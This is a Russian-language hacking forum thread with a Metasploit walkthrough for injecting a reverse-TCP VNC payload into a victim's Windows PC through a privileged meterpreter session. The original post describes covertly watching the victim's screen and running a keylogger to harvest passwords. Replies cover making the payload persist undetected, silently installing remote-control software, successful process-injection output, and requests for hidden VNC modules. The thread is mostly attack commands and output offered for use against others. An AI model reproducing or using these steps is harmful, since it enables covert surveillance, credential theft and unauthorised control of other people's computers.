Захват VNC сессии на удаленном компьютере.

Vander

Administrator
Gold Team
16.01.2016
1 074
2 754
#1
Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

upload_2016-9-7_14-37-25.png

(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

> use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

upload_2016-9-7_14-39-13.png

Убеждаемся, что все идет успешно:

upload_2016-9-7_14-39-38.png

В результате этих действий будет открыто окно VNC – сервера:

upload_2016-9-7_14-40-14.png

На этом все, вопросы и пожелания жду в комментариях.
 
Последнее редактирование:

Triton

Well-known member
01.10.2016
58
52
#7
кто нибудь знает как беспалевно вживить payload на постоянно?
В отрытой сессии пейлоада:
Пропишет нагрузку как сервис.
Справка:
OPTIONS:

-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
 
Симпатии: Понравилось m0tion

Ishikawa

マエストロ
Премиум
15.11.2016
126
193
#8
Под винду можно LiteManager Server ставить с ключем /silent
Устанавливается тихо, отрывает TCP 5650, сам ставится в accept firewall
И можно не только смотреть, но и управлять, режимов масса.
 

OmeN

New member
21.03.2017
1
0
#9
я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
 

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 157
2 476
#10
я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
Это надо вводить в msf консоль
сначало msfconsole запускаем.
 
25.03.2017
8
2
#11
Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
 

DSW

Well-known member
20.03.2017
71
21
#12
Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
set LHOST ip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1
 
25.03.2017
8
2
#13
set LHOST ip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1
use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

Какая команда указывает жертву?
 

DSW

Well-known member
20.03.2017
71
21
#14
use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

Какая команда указывает жертву?
Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем
 

Chena

Member
10.02.2017
12
4
#16
Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
 

Dmitry88

Премиум
29.12.2016
117
134
#17
Подниму старую тему. Не могу побороть вин7 х64. "VNC closed connection" , пейлоад отрабатвывает нормально, а вот подключиться не могу. Утром тестил на х32 все отлично было. Потом пару раз запускал на х64.

Код:
Executing the VNC agent with endpoint 10.10.ххх.ххх:4545...

TigerVNC Viewer 64-bit v1.7.0
Built on: 2017-04-09 14:55
Copyright (C) 1999-2016 TigerVNC Team and many others (see README.txt)
See http://www.tigervnc.org for information on TigerVNC.
meterpreter >
Fri Jun 23 16:46:45 2017
DecodeManager: Detected 2 CPU core(s)
DecodeManager: Creating 2 decoder thread(s)
CConn:       connected to host 127.0.0.1 port 5900
CConn:       End of stream
И все. подключиться не могу.
 
07.09.2017
250
259
#18
[*] Starting exploit/multi/handler
[*] Performing Architecture Check
[-] Handler failed to bind to 192.168.0.102:4433:- -
[*] Started reverse TCP handler on 0.0.0.0:4433
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 3880
[*] Opening process 3880
[*] Generating payload
[*] Allocating memory in procees 3880
[*] Allocated memory at address 0x007a0000, for 281 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 3880
[*] Post module execution completed


Но ничего не открывается....
 
02.11.2017
13
13
#19
А если нужны Hide VNC, посоветуете в какую сторону смотреть? Кусочек который отвалился от Зевса не предлагать.